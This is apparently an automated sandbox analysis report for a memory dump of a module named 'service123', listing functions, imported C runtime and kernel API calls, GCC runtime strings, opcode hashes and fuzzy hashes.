Instruction Fuzzy Hash: D6B1C171A0834A8FD710DF59C480B9ABBF1BF86708F08496DED959BB42C375E904CB92

Function 6C29C470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7c624fc892d98a44e5c0d7901b757af5171f54d56c1f86a7ed4ac03fb04420bd
Instruction ID: a4b4eb067ab6d31a08d81356b6273f39547d26d7bcd48e28ba6ac0a496e2733b
Opcode Fuzzy Hash: 7c624fc892d98a44e5c0d7901b757af5171f54d56c1f86a7ed4ac03fb04420bd
Instruction Fuzzy Hash: 5941BDB1A112198FCB00DF69C8817E9BBF5BF49358F18846AEC58EF782D3359442CB60

Function 6C29D370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C29CD00: strlen.MSVCRT ref: 6C29CD7D

Sleep.KERNEL32 ref: 6C29D4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: e942e4042ddfb274149aa9fc4482d0f540899258c5fa040fc28182563e7c7a3b
Instruction ID: 4d13e873daad975553db3b386d9a951b2e77f1d0fd66b6053fe11403ac69a36e
Opcode Fuzzy Hash: e942e4042ddfb274149aa9fc4482d0f540899258c5fa040fc28182563e7c7a3b
Instruction Fuzzy Hash: 7351FFA02083C5CAEF11DB3EC4457957FF89763308F18455ADA884B682D3BA5549CB7E

Function 6C29D570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: bd305f104b5071f74d5dfda102f16439e423b1cc98f3f9428c594d63b6590a8e
Instruction ID: 2d75e6c0f5abafa3cd9716d31e2a5862dea4953a6f5b988f271c3048320ea5eb
Opcode Fuzzy Hash: bd305f104b5071f74d5dfda102f16439e423b1cc98f3f9428c594d63b6590a8e
Instruction Fuzzy Hash: DA31D37060930A9FE310DF6BE98076AB7F4EBC5358F14892EEA9887B01D335D4449F81

Function 6C29D67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: 6f81ef192160b6c433d150f2864b960fd6cae9f0458e368fd421ea0e204062b8
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: 6BB01210ED912CD340003BE744401B5B23C5B033887107C014E0733D030B32F45E8C5C

Function 6C29D6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 8d51a53fe398492ec0b9816e2732815d464cd572c893c9622e069fcf2dcfca0c
Instruction ID: e28cda2f1c831730fc6701600422a5ba104e81b6a8218edc0ac01a071db06dee
Opcode Fuzzy Hash: 8d51a53fe398492ec0b9816e2732815d464cd572c893c9622e069fcf2dcfca0c
Instruction Fuzzy Hash: 7C414974A0934A8FD310DF1AC58076ABBE0FF89708F108D2EE998C7B51D375D8449B92

Function 6C29D855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a6f3734f7b57099e88498cc683b1ae455dc202325786d8952613bd1aedea105b
Instruction ID: ff9895c77ecde8511136458e642ccb073f3bc7b2952713a5a85deb225c00bfa4
Opcode Fuzzy Hash: a6f3734f7b57099e88498cc683b1ae455dc202325786d8952613bd1aedea105b
Instruction Fuzzy Hash: AFE0E57194824B4BD300FEAAC0803257BB0BB4330CF141848DA5227987C335A44FCB45

Function 6C2AC0E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2AC151
fwrite.MSVCRT ref: 6C2AC1F8
fputs.MSVCRT ref: 6C2AC215
fwrite.MSVCRT ref: 6C2AC23E
fputs.MSVCRT ref: 6C2AC25D
fwrite.MSVCRT ref: 6C2AC28C
fwrite.MSVCRT ref: 6C2AC2BE
abort.MSVCRT ref: 6C2AC2C3
abort.MSVCRT ref: 6C366157
free.MSVCRT ref: 6C36615F

Part of subcall function 6C29A340: strlen.MSVCRT ref: 6C29A3C5
Part of subcall function 6C29A340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C2AC1CC), ref: 6C29A3E0
Part of subcall function 6C29A340: free.MSVCRT ref: 6C29A3EA

Strings

terminate called without an active exception, xrefs: 6C2AC285
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C2AC0F9
-, xrefs: 6C2AC271
terminate called after throwing an instance of ', xrefs: 6C2AC1F1

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: 7902b94235cb5a430ea0c50f535d360f82df61596757beab8e41de28a2665121
Instruction ID: f8223ec10e9cbccfe55138d735b7840a588025c7e203c69fcc77e8d7254df247
Opcode Fuzzy Hash: 7902b94235cb5a430ea0c50f535d360f82df61596757beab8e41de28a2665121
Instruction Fuzzy Hash: 7C5169B05083189FD700AFA6C48479ABBF4AF85308F00881EE8D887742D7799489CFA3

Function 6C29D8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1af52db418be4e0f17f4e7da650a5d717a49b50adc26a67320999ab86a91a6f8
Instruction ID: c3b47475170aa65270a1e10a39e66e146c66277ee2318207c4dab388e6831bcd
Opcode Fuzzy Hash: 1af52db418be4e0f17f4e7da650a5d717a49b50adc26a67320999ab86a91a6f8
Instruction Fuzzy Hash: 7DF089B096534A4FD3109F5AC4817657BB47B43355F580845DC441BB43C3359499DBE1

Function 6C29DE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C29DEB8

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 2e05c8a9b00fb299e377679b9a9cb2acc7d711613774c018c0330b4b8de17452
Instruction ID: d554f683e8a9961389413ef2301cbafaf3a2aff6d66518882faa53f8b611eb54
Opcode Fuzzy Hash: 2e05c8a9b00fb299e377679b9a9cb2acc7d711613774c018c0330b4b8de17452
Instruction Fuzzy Hash: B221D570A0025ECBDB10DF56CC80BDDB7B8AF86319F1045A6DD49AB710E7309E889F90

Function 6C29DA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 232a6e9f52a386d9e7e0f5fce988023f122210a683d3755b92d0831a1e57989a
Instruction ID: eb3774d35fdc3124e2f89d2cb335faf5bdb5c6a4e103182ea359d1a560619a0b
Opcode Fuzzy Hash: 232a6e9f52a386d9e7e0f5fce988023f122210a683d3755b92d0831a1e57989a
Instruction Fuzzy Hash: F2413C75A0421D9BCB10DF96C990BDEB7B1BF89318F1485A9DC09A7701D730AE89DF90

Function 6C29DCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 63de171b38ecbb3a71f895da575d8a182725567221f6bac945ab2f55da2bde80
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 05111C75A4021C9BCF14EFA6C8809DEB7B5AF86358F148964EC0967B01DB30AE49DBD0

Function 6C29DD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction ID: 89fc0fe0bf384f4fad10b8d9bee7f94dd1eed1caf29d0c27080f6470296b0283
Opcode Fuzzy Hash: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction Fuzzy Hash: CA211A74A0021DABCF10DF62C9809DEB7B5EF85348F1088A8DD0967741D730AE4ADF90

Function 6C2A0310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C36370F), ref: 6C2A034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C36370F), ref: 6C2A0352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C36370F), ref: 6C2A0360

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
